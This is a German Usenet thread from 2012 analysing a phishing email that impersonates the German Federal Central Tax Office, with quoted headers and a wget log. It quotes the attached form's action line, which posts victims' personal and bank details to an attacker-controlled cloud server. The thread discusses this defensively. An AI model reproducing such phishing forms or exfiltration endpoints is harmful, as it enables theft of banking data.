Spam vom "Finanzamt"

[Christoph Maercker]

Hallo,

heute in meiner Spamtonne eingeschlagen:

Return-Path: <bu...@bund.de>
Delivered-To: GMX delivery to zwei...@gmx-topmail.de
Received: (qmail invoked by alias); 26 Apr 2012 02:40:36 -0000
Received: from MP9.mpdedicated.com (EHLO server.bookkeeperzoo.com)
[109.123.118.66]
by mx0.gmx.net (mx071) with SMTP; 26 Apr 2012 04:40:36 +0200
Received: from [69.15.231.133] (port=4816 helo=bund.de)
by server.bookkeeperzoo.com with esmtpa (Exim 4.77)
(envelope-from <bu...@bund.de>)
id 1SNBpe-0001Aa-6c; Thu, 26 Apr 2012 00:41:10 +0100
Reply-To: nor...@bund.de
From: "Bundeszentralamt für Steuern" <bu...@bund.de>
Subject: Steuerrückerstattung Benachrichtigung
Date: 25 Apr 2012 19:38:26 -0400
Message-ID: <20120425193826....@bund.de>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0012_F6ACFAC8.345759EE"
X-AntiAbuse: This header was added to track abuse, please include it
with any abuse report
X-AntiAbuse: Primary Hostname - server.bookkeeperzoo.com
X-AntiAbuse: Original Domain - gmx-topmail.de
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - bund.de
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: -2 (not scanned, spam filter disabled);
Detail=5D7Q89H36p4L00VTXC6D4q0N+AH0PUCnKGJbGgJLbSXk30NezpdxUg==V1;
X-GMX-UID: ZXFpb/oqRiYoRI87bGti2KxpaDSu59qv
X-Flags: 1401

This is a multi-part message in MIME format.

------=_NextPart_000_0012_F6ACFAC8.345759EE
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<html>

<head>
<meta http-equiv=3D"Content-Language" content=3D"en-us">
<meta http-equiv=3D"Content-Type" content=3D"text/html;
charset=3Dwindows-12=
52">
</head>

<body>

<table cellpadding=3D"0" cellspacing=3D"0" width=3D"585">
<!-- MSTableType=3D"layout" -->
<tr>

=09=20=20
<td width=3D"583" height=3D"32" valign=3D"top"><img
src=3D"http://www.ge=hr-unitreu.de/upload/bilder/links/logo_bundeszentralamt_fuer_steuern.gif"><B=
r>
...
</table>

</body>
</html>
------=_NextPart_000_0012_F6ACFAC8.345759EE
Content-Type: text/html; name="Steuererstattungsansprüche Formular.htm"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Steuererstattungsansprüche
Formular.htm"
...
[base64-codierter html-Anhang]

Formular.htm fragt Personalien + Bankverbindung ab, was sonst. ;-)

Weitergeleitet an die Täter wird anscheinend mittels dieser Zeile:

<form method="post"
action="http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/100002.php"
name="HTMLForm">

ec2-79-125-118-208.eu-west-1.compute.amazonaws.com = 79.125.118.208
Whois sagt dazu
Owner: Amazon Web Services, Elastic Compute Cloud, EC2, EU

Ohne Postadresse, Tel.-Nr. Abuse-Address, ist das wirklich Amazon??

Der o.g. URL wird umgeleitet auf
http://www.bzst.de/DE/Home/home_node.html und führt letzlich zu einer
Pressemitteilung von heute:
http://www.bzst.de/DE/Ueber_Uns/Presse/Pressemitteilungen/pressemitteilung_2012_04_26.html

Beim Ministerium sind die Gauner also bereits bekannt, aber wie erfolgt
die Umleitung? Sie passiert nur, wenn die PHP-Seite aufgerufen wird,
nicht aber beim Aufruf von
http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/
bzw.
http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/
Beides übrigens Seiten, die nicht eben Amazon-like aussehen. ;-)
Oder ist das wirklich eine seriöse Site (von Amazon?), die kurzzeitig
gehackt wurde und der rechtmäßige Besitzer hat die Umleitung in den
PHP-Script eingebaut, womöglich in Absprache mit dem hiesigen
Steuerzentralamt? Das wäre mal eine neuartige Antwort auf eine
neuartige(?) Masche. Diese Sorte Spam sehe ich heute jedenfalls zum
ersten mal und das BZST anscheinend auch.
--


CU Christoph Maercker.

[Christian Zietz]

Christoph Maercker schrieb:

> ec2-79-125-118-208.eu-west-1.compute.amazonaws.com = 79.125.118.208
> Whois sagt dazu
> Owner: Amazon Web Services, Elastic Compute Cloud, EC2, EU
>
> Ohne Postadresse, Tel.-Nr. Abuse-Address, ist das wirklich Amazon??

Naja, es steht da ja: Das ist Amazons Elastic Compute Cloud [1]. Dort
kann jeder einen (virtuellen) Server anmieten.

Christian

[1] <http://aws.amazon.com/de/ec2/>
--
Christian Zietz - CHZ-Soft - czietz (at) gmx.net
WWW: http://www.chzsoft.de/
PGP/GnuPG-Key-ID: 0x6DA025CA

[Karl-Josef Ziegler]

Hallo Christoph!

Am 26.04.2012 12:59, schrieb Christoph Maercker:

> Beides übrigens Seiten, die nicht eben Amazon-like aussehen. ;-)
> Oder ist das wirklich eine seriöse Site (von Amazon?), die kurzzeitig
> gehackt wurde und der rechtmäßige Besitzer hat die Umleitung in den
> PHP-Script eingebaut, womöglich in Absprache mit dem hiesigen
> Steuerzentralamt?

Nein, Amazon hat zum Betreiben seiner weltweiten Online-Shops recht
große Rechenzentren aufgebaut und vermietet 'überschüssige'
Rechnerkapazität, da sie nicht ganzjährig voll gebraucht wird, an andere
Kunden weiter. Fraglich ist, ob 'faule bzw. gecrackte' Kunden von Amazon
zeitnah 'abgeklemmt' werden.

Viele Grüße,

- Karl-Josef

[Christoph Maercker]

Karl-Josef Ziegler wrote:
> Nein, Amazon hat zum Betreiben seiner weltweiten Online-Shops recht
> große Rechenzentren aufgebaut und vermietet 'überschüssige'
> Rechnerkapazität, da sie nicht ganzjährig voll gebraucht wird, an andere

OK, das erklärt's. Damit können sich die "Kunden" das Hacking sparen.

> Kunden weiter. Fraglich ist, ob 'faule bzw. gecrackte' Kunden von Amazon
> zeitnah 'abgeklemmt' werden.

Sieht mir aber ganz so aus, noch dazu mit der genialen Methode, die
Website-User an die "zuständigen Organe" weiterzuleiten.

BTW: Wie kommt man an die PHP-Quelle ran? Selbst mit WGet bekomme ich
nur die umgeleitete Seite vom BZST. WGet-Logauszug:

http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/100002.php
=> `ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/100002.php'
Resolving ec2-79-125-118-208.eu-west-1.compute.amazonaws.com...
79.125.118.208
Connecting to
ec2-79-125-118-208.eu-west-1.compute.amazonaws.com[79.125.118.208]:80...
connected.
HTTP request sent, awaiting response...
1 HTTP/1.1 302 Found
2 Date: Thu, 26 Apr 2012 13:44:16 GMT
3 Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
4 X-Powered-By: PHP/5.2.6-3ubuntu4.6
5 Location: http://www.bzst.de/DE/Home/home_node.html
6 Vary: Accept-Encoding
7 Content-Length: 0
8 Keep-Alive: timeout=15, max=100
9 Connection: Keep-Alive
10 Content-Type: text/html

Location: http://www.bzst.de/DE/Home/home_node.html [following]
http://www.bzst.de/DE/Home/home_node.html
=> `www.bzst.de/DE/Home/home_node.html'
Resolving www.bzst.de... 80.245.152.58
Connecting to www.bzst.de[80.245.152.58]:80... connected.
... usw.

Wird das Ding etwa vom Bund selber betrieben und die zählen, wieviele
auf den Trick reinfallen? Dann hättest Du recht mit der Annahme, dass
Amazon wenig gegen $Spammie unternimmt. ;-)

Sollte glatt mal testen, ob und wie sie dort auf Beschwerde reagieren,
ungeachtet der Tatsache, dass sie für diese IP-Range keine Abuse-Adresse
angeben.
--


CU Christoph Maercker.

[Karl-Josef Ziegler]

Am 26.04.2012 15:52, schrieb Christoph Maercker:

> Sieht mir aber ganz so aus, noch dazu mit der genialen Methode, die
> Website-User an die "zuständigen Organe" weiterzuleiten.

Soweit ich es bisher vernommen habe, geht Amazon gegen 'faule
Kundschaft' doch nur sehr zögerlich vor, aber das kennt man ja auch von
Google oder Yahoo. Da schlägt dann wieder die Regel zu, die ich
'Arroganz der Macht (bzw. Größe) nenne. Motto: wir sind so groß, uns
kann keiner...

> BTW: Wie kommt man an die PHP-Quelle ran? Selbst mit WGet bekomme ich
> nur die umgeleitete Seite vom BZST. WGet-Logauszug:

Auch die Analyse von Wepawet bringt leider nur die Weiterleitung:

http://wepawet.iseclab.org/view.php?hash=02b244b52e8f25702617ec3177859efc&t=1335450077&type=js

Soweit es mir bekannt ist, kommt man nur an Javascript-Seiten (.js) ran,
da diese ja browserbasiert arbeiten und damit herunterladbar sein
müssen. PHP-Skripte sind serverbasiert und benötigen keinen Download.
Aber vielleicht kennt einer der 'Cracks' hier doch noch einen Workaround.

Viele Grüße,

- Karl-Josef

[Ulrich F. Heidenreich]

Christoph Maercker in <news:jnb9qa$ok9$1...@fuerst.cs.uni-magdeburg.de>:

[..]

Dazu schneite BTW gerade jenes rein:

|DPA 2012-04-26 15:19:22
|
| Das Bundesfinanzministerium hat Steuerzahler vor E-Mail-Betrügern
| gewarnt, die an Daten von Konto und Kreditkarte kommen wollen. Die
| Kriminellen geben sich demnach als «Bundeszentralamt für Steuern»
| aus und behaupten, der Empfänger habe zu viel Einkommensteuer
| gezahlt. Um eine Rückerstattung zu erhalten, soll ein in der E-Mail
| angehängtes Antragsformular ausgefüllt werden. Darin werden
| Kontonummer, Kreditkarte und Sicherheitscode abgefragt. Das
| Ministerium empfiehlt, nicht auf solche Mails zu reagieren.

CU!
Ulrich
--
Eigenwillige Empfehlungen: http://invalid.de/Amazon/
In 7 Monaten und 29 Tagen ist Weihnachten
IUNY9 PODAW 78A9T 3917R NT0RX HTFR1 RR73U SACY6 U6B84
Stellt euch vor, es ist Donnerstag und keiner geht hin!

[Stefan Reuther]

Christoph Maercker wrote:

> Karl-Josef Ziegler wrote:
>> Kunden weiter. Fraglich ist, ob 'faule bzw. gecrackte' Kunden von Amazon
>> zeitnah 'abgeklemmt' werden.
>
> Sieht mir aber ganz so aus, noch dazu mit der genialen Methode, die
> Website-User an die "zuständigen Organe" weiterzuleiten.
>
> BTW: Wie kommt man an die PHP-Quelle ran?

An die Quelle? Gar nicht, es sei denn, du hackst den Server oder findest
sonst eine Umgehung.

> Selbst mit WGet bekomme ich nur die umgeleitete Seite vom BZST.
> WGet-Logauszug:

Die Umleitung wird vom PHP-Script auf dem Server generiert. Und zwar
nachdem das PHP-Script die Daten des Opfers erhalten und ausgewertet hat.


Stefan

[Christoph Maercker]

Ulrich F. Heidenreich wrote:
> Dazu schneite BTW gerade jenes rein:
>
> |DPA 2012-04-26 15:19:22
> |
> | Das Bundesfinanzministerium hat Steuerzahler vor E-Mail-Betrügern
> | gewarnt, die an Daten von Konto und Kreditkarte kommen wollen. Die
> | Kriminellen geben sich demnach als «Bundeszentralamt für Steuern»
> | aus und behaupten, der Empfänger habe zu viel Einkommensteuer
> | gezahlt. Um eine Rückerstattung zu erhalten, soll ein in der E-Mail
> | angehängtes Antragsformular ausgefüllt werden. Darin werden
> | Kontonummer, Kreditkarte und Sicherheitscode abgefragt. Das
> | Ministerium empfiehlt, nicht auf solche Mails zu reagieren.

ACK, das bezieht sich auf deren Online-Pressemeldung, auf die der Nutzer
des Phisingforms freundlicherweise umgeleitet wird. Ich wüsste nur noch
gern, wieso. Ein solcher Service ist für Spammer absolut ungewöhnlich
und obendrein geschäftsschädigend. ;-)

--


CU Christoph Maercker.

[Christoph Maercker]

Stefan Reuther wrote:
> Die Umleitung wird vom PHP-Script auf dem Server generiert. Und zwar
> nachdem das PHP-Script die Daten des Opfers erhalten und ausgewertet hat.

Letzteres ist die Frage. Und außerdem, wer die Umleitung eingebaut hat
und warum.

--


CU Christoph Maercker.

[Christoph Maercker]

Andreas Kohlbach wrote:
> Ich hatte mal gelesen, dass es jemandem gelungen sei, einen Server zu
> DDOSen, und die Last hat wohl die PHP Engine nicht ertragen, und die hat
> dann den Code direkt gedumpt.

Möglich, aber im vorliegenden Fall vielleicht gar nicht notwendig.
Denkbar wäre, Amazon als Hoster hat den Kollegen vom BZST oder wem auch
immer die betr. Website freigegeben, so dass sie die Umleitung einbauen
konnten, oder das Ganze ist von Anfang an eine Art Test, z.B. um
festzustellen, wieviele User denn so auf den Trick reinfallen. Dann
würde ich aber vermuten, dass die Schlapphüte mitmischen.

> Btw. Phisher haben manchmal den ganzen Code (HTML, CSS, JS, auch PHP) in
> einem zip Archiv auf eben ihrer Seite. Man kann oft die Phisher URL von
> hinten her kürzen. Und wenn das Directory Listing nicht verboten ist,
> kann man die Dateien sehen. Manchmal ist gar die Shell da, und lädt zum
> Spielen ein. ;-)

Derlei Versuche hatte ich in meinen Vorpostings schon erwähnt. Der
Aufruf von
http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/
wird beantwortet mit:

Index of /logs
[ICO] Name Last modified Size Description
Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch Server at
ec2-79-125-118-208.eu-west-1.compute.amazonaws.com Port 80

Die im Mail-Anhang angegebene PHP-Datei 100002.php suche ich dort vergebens.

Das angehänge html-Formular schickt auf jeden Fall die eingetragenen
Daten an
http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/100002.php
und die Umleitung läuft wie beschrieben ab. Ob der PHP-Script die Daten
noch ausliest oder diese Funktion geerdet wurde, werden wir wohl nicht
so leicht herausbekommen.
--


CU Christoph Maercker.

[Christoph Maercker]

Christoph Maercker wrote:
> ... , noch dazu mit der genialen Methode, ... an die "zuständigen Organe" weiterzuleiten.

Ein Indiz dass meine Vermutung stimmen könnte: Das im angehängten
Formular aufgerufene Image
http://www.bzst.de/SiteGlobals/StyleBundles/Bilder/Farbschema_A/logo_a.jpg?__blob=normal
wurde inzwischen vom Betreiber der beklauten Website durch eine
unzweideutige Warnung ersetzt. ;-)
Gestern konnte man im Formular noch das Impressum des BZST aufrufen
u.a.m., das funktioniert jetzt nicht mehr.

--


CU Christoph Maercker.

[Karl-Josef Ziegler]

Am 27.04.2012 10:26, schrieb Christoph Maercker:

> Das angehänge html-Formular schickt auf jeden Fall die eingetragenen
> Daten an
> http://ec2-79-125-118-208.eu-west-1.compute.amazonaws.com/logs/100002.php
> und die Umleitung läuft wie beschrieben ab. Ob der PHP-Script die Daten
> noch ausliest oder diese Funktion geerdet wurde, werden wir wohl nicht
> so leicht herausbekommen.

Das gehört aber eigentlich zum Standard-Repertoire aller Phisher.
Zunächst werden die Daten auf der Fake-Webseite abgephisht und dann wird
man zur Originalseite weitergeleitet. Absolutes Phisher-Standardprogramm.

Viele Grüße,

- Karl-Josef

[Michael Unger]

On 2012-04-27 14:34, "Christoph Maercker" wrote:

> [...]
>
> [...] darunter welche, denen man ob
> akadämlichem Grad einen Mindest-IQ zutrauen sollte. ;-)

Theologe? Sinologe? Oder "nur" Psychologe? Nicht alle Akademiker haben
einen Bezug zur IT ...

Michael

--
Real names enhance the probability of getting real answers.
My e-mail account at DECUS Munich is no longer valid.

[Stefan Reuther]

Christoph Maercker wrote:
> Stefan Reuther wrote:
>> Die Umleitung wird vom PHP-Script auf dem Server generiert. Und zwar
>> nachdem das PHP-Script die Daten des Opfers erhalten und ausgewertet hat.
>
> Letzteres ist die Frage. Und außerdem, wer die Umleitung eingebaut hat

Der Phisher. Wer sonst?

> und warum.

Damit er nicht die Originalwebseite nachbauen muss und beim Nutzer dann
eine vertraute URL in der Adressleiste steht.

Wenn du in der Fußgängerzone phishen willst, baust du dir auch kein
Sparkassenhäuschen aus Pappe, sondern fragst die Leute nach ihrer Karte
und PIN und schickst sie dann zum Erhalt ihres Geldes an den Sparkassen-
automaten da drüben.


Stefan

[Andreas Kohlbach]

Christoph Maercker wrote on 27. April 2012:

>
> Karl-Josef Ziegler wrote:
>> Das gehört aber eigentlich zum Standard-Repertoire aller Phisher.
>> Zunächst werden die Daten auf der Fake-Webseite abgephisht und dann wird
>> man zur Originalseite weitergeleitet. Absolutes Phisher-Standardprogramm.
>

> Umso einfacher, dann brauchten sie überhaupt nicht an die
> Original-Site ran, bzst.de hat einfach die aufgerufenen Seiten mit
> Warnungen gespickt.

Das sollten Banken etc. eh machen. Wenn ein Referrer bestimmte
Phisher-typische Muster aufweist, könnte man eine Warnung ausgeben, dass
man sich, falls man eben wirklich gerade ein Formular ausgefüllt hat,
sich umgehend mit der Filiale zwecks Sperrung des eigenen Passworts in
Verbindung setzen sollte.
--
Andreas
You know you're a Redneck when
18. You go to the stock car races and don't need a program.

[Ulrich F. Heidenreich]

Andreas Kohlbach in <news:87bomck...@usenet.ankman.de>:

>Das sollten Banken etc. eh machen. Wenn ein Referrer bestimmte
>Phisher-typische Muster aufweist, könnte man eine Warnung ausgeben, dass
>man sich, falls man eben wirklich gerade ein Formular ausgefüllt hat,
>sich umgehend mit der Filiale zwecks Sperrung des eigenen Passworts in
>Verbindung setzen sollte.

Noch besser sollte die Bank den Zugang sofort sperren. Wie sie es
zum Beispiel ja auch nach dreimaliger Fehleingabe einer TAN macht.

CU!
Ulrich
--
Eigenwillige Empfehlungen: http://invalid.de/Amazon/

In 7 Monaten und 27 Tagen ist Weihnachten
2AK3A 8G0RT MNOE5 2JWBL WBSF0 P4K9W NNMV8 OOY8P 3O4PJ
Stellt euch vor, es ist Samstag und keiner geht hin!

[Andreas Kohlbach]

Ulrich F. Heidenreich wrote on 28. April 2012:
>
> Andreas Kohlbach in <news:87bomck...@usenet.ankman.de>:
>
>>Das sollten Banken etc. eh machen. Wenn ein Referrer bestimmte
>>Phisher-typische Muster aufweist, könnte man eine Warnung ausgeben, dass
>>man sich, falls man eben wirklich gerade ein Formular ausgefüllt hat,
>>sich umgehend mit der Filiale zwecks Sperrung des eigenen Passworts in
>>Verbindung setzen sollte.
>
> Noch besser sollte die Bank den Zugang sofort sperren. Wie sie es
> zum Beispiel ja auch nach dreimaliger Fehleingabe einer TAN macht.

Dann könnte wer Joejobs gegen andere fahren.

Oder ich machte das versehentlich. Ein Skript, was ich hin und wieder
gegen Phisher fahre, könnte zufälliger Weise echte Kontonummern von
Kunden generieren.
--
Andreas
90. Wow....that seemed _fast_.....
--Top 100 things you don't want the sysadmin to say

[Ulrich F. Heidenreich]

Andreas Kohlbach in <news:8762cj2...@usenet.ankman.de>:

>Ulrich F. Heidenreich wrote on 28. April 2012:
>>
>> Andreas Kohlbach in <news:87bomck...@usenet.ankman.de>:
>>
>>>Das sollten Banken etc. eh machen. Wenn ein Referrer bestimmte
>>>Phisher-typische Muster aufweist, könnte man eine Warnung ausgeben, dass
>>>man sich, falls man eben wirklich gerade ein Formular ausgefüllt hat,
>>>sich umgehend mit der Filiale zwecks Sperrung des eigenen Passworts in
>>>Verbindung setzen sollte.
>>
>> Noch besser sollte die Bank den Zugang sofort sperren. Wie sie es
>> zum Beispiel ja auch nach dreimaliger Fehleingabe einer TAN macht.
>
>Dann könnte wer Joejobs gegen andere fahren.

Das könnte jemand durch die dreimalige TAN-Fehleingabe auch.

>Oder ich machte das versehentlich. Ein Skript, was ich hin und wieder
>gegen Phisher fahre, könnte zufälliger Weise echte Kontonummern von
>Kunden generieren.

Ein Grund mit, diesen Unfug zu unterlassen.

CU!
Ulrich
--
Eigenwillige Empfehlungen: http://invalid.de/Amazon/

In 7 Monaten und 26 Tagen ist Weihnachten
0LEEB C86J2 5J5X6 SJE5M R2UAA 8OD5U EPSL6 69GDO 3OBK5
Stellt euch vor, es ist Sonntag und keiner geht hin!

[Christoph Maercker]

Michael Unger wrote:
> Theologe? Sinologe? Oder "nur" Psychologe? Nicht alle Akademiker haben
> einen Bezug zur IT ...

Um nicht irgendwelche Links in unverlangten Mails anzuklicken genügt
gesunder Menschenverstand gepaart mit etwas Vorsicht. Die Fachrichtung
ist dann ziemlich egal. ;-)
--


CU Christoph Maercker.

[Martin Hotze]

Am 27.04.2012 14:34, schrieb Christoph Maercker:
> Aber selbst auf so was fallen User herein, darunter welche, denen man ob

> akadämlichem Grad einen Mindest-IQ zutrauen sollte. ;-)

^^^^^^^^^^^^^^^^^^

da besteht der Mindest-IQ doch aus copy&paste, oder?

#m
--
"What would I do with 72 virgins? That's not a reward,
that's a punishment. Give me two seasoned whores any day."
(Billy Connolly)

[Thomas Rachel]

Am 27.04.2012 16:12 schrieb Michael Unger:
> On 2012-04-27 14:34, "Christoph Maercker" wrote:
>
>> [...]
>>
>> [...] darunter welche, denen man ob
>> akadämlichem Grad einen Mindest-IQ zutrauen sollte. ;-)
>
> Theologe? Sinologe? Oder "nur" Psychologe? Nicht alle Akademiker haben
> einen Bezug zur IT ...

Sie sollten dennoch mittlerweile eine gewisse Medienkompetenz aufweisen.
Diese hat mit der eigentlichen IT nur wenig zu tun.


Thomas